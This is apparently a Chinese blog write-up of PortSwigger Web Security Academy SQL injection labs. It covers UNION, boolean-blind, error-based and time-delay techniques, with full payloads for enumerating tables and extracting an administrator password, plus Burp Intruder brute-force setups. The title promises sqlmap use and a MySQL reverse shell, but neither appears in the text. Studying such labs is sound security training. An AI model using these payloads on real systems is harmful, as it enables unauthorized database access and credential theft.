SQL注入一文全解----包括Sqlmap的利用，利用mysql写reverseshell

原创已于 2024-01-08 19:06:37 修改 · 1.1k 阅读

18 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库 #网络安全 #postgresql #mysql #安全 #web安全

于 2024-01-06 23:31:05 首次发布

Sql注入更多姿势

1. PostSwigger

SQL injection cheat sheet | Web Security Academy

案例

联合注入的手动测试
1. 判断字段数
  1. 'ORDER+BY+2-- 字段数为2，
  2. 3时报错，故而2
2. 判断子段能否接受字符串
  1. 'UNION+SELECT+‘123’,‘dfsfa’–
  2. 页面返回成功，可以接受
3. 判断数据库类型
  1. 'UNION+SELECT+@@version,‘dfsfa’–
  2. MySQL和微软
  3. 'UNION+SELECT+version(),‘dfsfa’–
  4. PostgreSQL
  5. 'UNION+SELECT+NULL,version FROM v$instance –
  6. Oracle
  经验证为PostSql
4. 查询表名
  1. '+UNION+SELECT+tablename,NULL+FROM+informationschema.tables–
  2. 查到users_yxcapd 可能包含username or passwd informations
5. 查询列名字
  1. ‘+UNION+SELECT+columnname,NULL+FROM+informationschema.columns+where+tablename='usersyxcapd’–
  2. 得到 passworduuqjjs and usernamefrlczf two columns name
6. 查询内容
  1. '+UNION+SELECT+passworduuqjjs,usernamefrlczf+FROM+users_yxcapd–
基于响应的盲注手动测试

注意引号的闭合
1. 注入点判断
  1. TrackingId=xyz’ AND ‘1’='1
  2. TrackingId=xyz’ AND ‘1’='2
2. 判断是否存在users表
  1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)='a
  2. SELECT ‘a’ FROM users 这一部分表示返回’a’ 常量，若users存在，则返回a 。若不存在则页面出错。（测试时使用的网页表现为若正常则返回welcome ，否则没有welcome）
  3. limit 1 表示无论有多少数据只返回第一行，不对列进行操作
  4. 即：只有users表存在的时候，逻辑关系是 ‘a’='a’成立，才会返回welcom。
3. 判断是否存在administrator用户
  1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)='a
  2. SELECT ‘a’ FROM users 这一部分恒真
  3. WHERE username=‘administrator’ 若存在则真逻辑关系’a’='a’才成立返回welcome。
4. 判断administrator的密码长度
  1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)='a
  2. SELECT ‘a’ FROM users 恒真
  3. WHERE username=‘administrator’ 恒真
  4. LENGTH(password)>1) 模糊测试若密码长度大于1则为真，逻辑关系’a’='a’成立。返回welcome
5. 继续判断
  1. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>3)='a 不断修改password>i (i∈1 2 3 4 ……)
6. 确定密码长度后确定密码每个位置的字符
  1. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='a
  2. SELECT SUBSTRING(password,1,1) substring为子串函数，表示password的第1个字符匹配1位。
  3. 通过不断修改substring(password,2,1) 的数值，来逐个判断出每个字符串的具体字符。
7. burpsuite添加字符逐个爆破
  1. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='§a§
  2. 思路------通过修改substring(password,i,1) i处的数值，来判断是否等于最后结尾处的§a§
  3. §a§ 的范围设置在a-z，0-9之间
  4. 即: substring(password,i,1) 当i等于1时,表示密码中的第一位字符去匹配a-z,1-9 看看是否界面返回了welcome–这一功能我们可以在inthder模块中的grep 匹配中设置我们需要匹配的字符来实现。
  适用情况:SQL查询的结果不返回，也不显示错误信息。但如果查询返回任何行，应用程序会在页面中包含一条“欢迎回来”消息。
基于错误的盲注手动测试
1. 判断是否存在注入点
  1. TrackingId=xyz**'**
  2. 加 ’ 查看是否报错
2. 再次判断
  1. TrackingId=xyz**‘’**
  2. 加双单引号查看错误是否消失
  3. 若消失则可以说明 ’ 产生了作用,表明语法错误（在本例中为未闭合的引号）对响应产生了可检测到的影响
3. 尝试
  1. TrackingId=xyz’||(SELECT ’ ')||’ 其中 ||为字符串拼接相当于在后面拼接了一个空白,不产生任何作用
  2. 上述发生报错,说明,数据库不支持该格式,修改
  3. TrackingId=xyz’||(SELECT ‘’ FROM dual)||’ dual表是Oracle特有的表 .响应无报错说明该数据库为Oracle
  4. 这要求所有SELECT语句显式指定表名-----Oracle特有
4. 在判断完数据库后,验证是否确实存在注入
  1. TrackingId=xyz’||(SELECT ‘’ FROM not-a-real-table)||’ 其中 not-a-real-table是一个不存在的表
  2. 上述出现报错. 此行为强烈表明后端正在将注入作为 SQL 查询进行处理。
5. 判断表名
  1. TrackingId=xyz’||(SELECT ‘’ FROM users WHERE ROWNUM = 1)||’ 查看users表是否存在
  2. 若没有返回错误,这说明该表确实存在
  3. 其中 rownum函数相当于 MySQL中的 limit 1 都表示返回一行. 但是在Oracle中没有limit函数。故而采用其他函数进行平替
  4. 添加rownum函数的目的在于防止查询返回多于一行，这会破坏我们的串联。
6. 测试 case end 该测试条件是否可以响应
  1. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —若响应则应报错
  2. TrackingId=xyz’||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —修改判断条件，报错消失。表明可以根据特定条件的真实性有条件地触发错误
7. 判断administrator用户是否存在
  1. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —若存在则报错
8. 判断密码长度
  1. TrackingId=xyz’||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
9. burpsuite 判断字符
  1. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘a’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  2. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  3. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —修改数值判断…….
  4. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,§2§,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ ****把两处都添加为变量进行破解
  5. 第一处为1-20 从密码长度得出。
  6. 第二处改为a-z 0-9 A-Z
基于可见错误的盲注手动测试
1. 判断是否存在注入点
  1. TrackingId=ogAZZfxtOKUELbuJ’ 是否出现错误
  2. TrackingId=ogAZZfxtOKUELbuJ’’ 错误是否消失
  3. 判断TrackingId=ogAZZfxtOKUELbuJ’-- 错误是否消失这里说明注释起到了作用 —这里出现了报错信息的回显，表明可以利用报错注入
2. 构造报错语句
  1. ’ AND CAST((SELECT 1) AS int)-- 这里的cast()函数可以修改数据的数据类型
  2. 即: 把 1 转化为整数类型运行后发现报错([ERROR: argument of AND must be type boolean, not type integer](ERROR: argument of AND must be type boolean, not type integer)) 根据报错可知 and 后面必须是一个布尔型的数据类型
3. 根据报错进行构造
  1. ’ AND **1=**CAST((SELECT 1) AS int)-- 报错消失,说明构造的语句发挥了作用
  2. ’ AND 1=CAST((SELECT username FROM users) AS int)-- 再次进行构造,尝试获取username —出现报错
  3. 报错信息(Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = ‘fOPoniV9hYwm4fZ3’ AND 1=CAST((SELECT username FROM users) AS’. Expected char)
  4. 这说明字符数过于多,尝试删除cookie来空出字符
  5. TrackingId=’ AND 1=CAST((SELECT username FROM users) AS int)-- 报错信息变更,说明更改产生了作用
  6. 报错信息([ERROR: more than one row returned by a subquery used as an expression](ERROR: more than one row returned by a subquery used as an expression)) 这表明返回不仅一行
  7. TrackingId=’ AND 1=CAST((SELECT username FROM users limit 1) AS int)-- —再次进行构造,限制返回行数
  8. 出现错误信息([ERROR: invalid input syntax for type integer: “administrator”](ERROR: invalid input syntax for type integer: “administrator”)) —这返回了第一个用户administrator
  9. 即:泄漏了表中的第一个用户名
4. 获取密码
  1. ’ AND 1=CAST((SELECT password FROM users limit 1) AS int)-- —构造语句获取密码
  2. 报错信息([ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”](ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”))
带有时间延迟和信息检索的盲注手动测试
1. 判断是否存在时间盲注
  1. trackingId=x’ ; SELECT+CASE+WHEN+(1=1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END–
  2. 若存在时间盲注则该响应会等待十秒才会响应
  3. TrackingId=x’%3BSELECT+CASE+WHEN+(1=2)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END-- 验证是否是因为语句延迟（排除网络因素）
2. 判断用户名
  1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  2. 延迟存在，说明存在administrator用户
3. 判断密码长度
  1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+LENGTH(password)>1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  2. 多次测试最终确定密码长度为20
4. 密码爆破
  1. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+SUBSTRING(password,1,1)=‘a’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  2. 在bp中添加payload 进行爆破，在列中选择发送到响应。时间较长的便是延迟存在的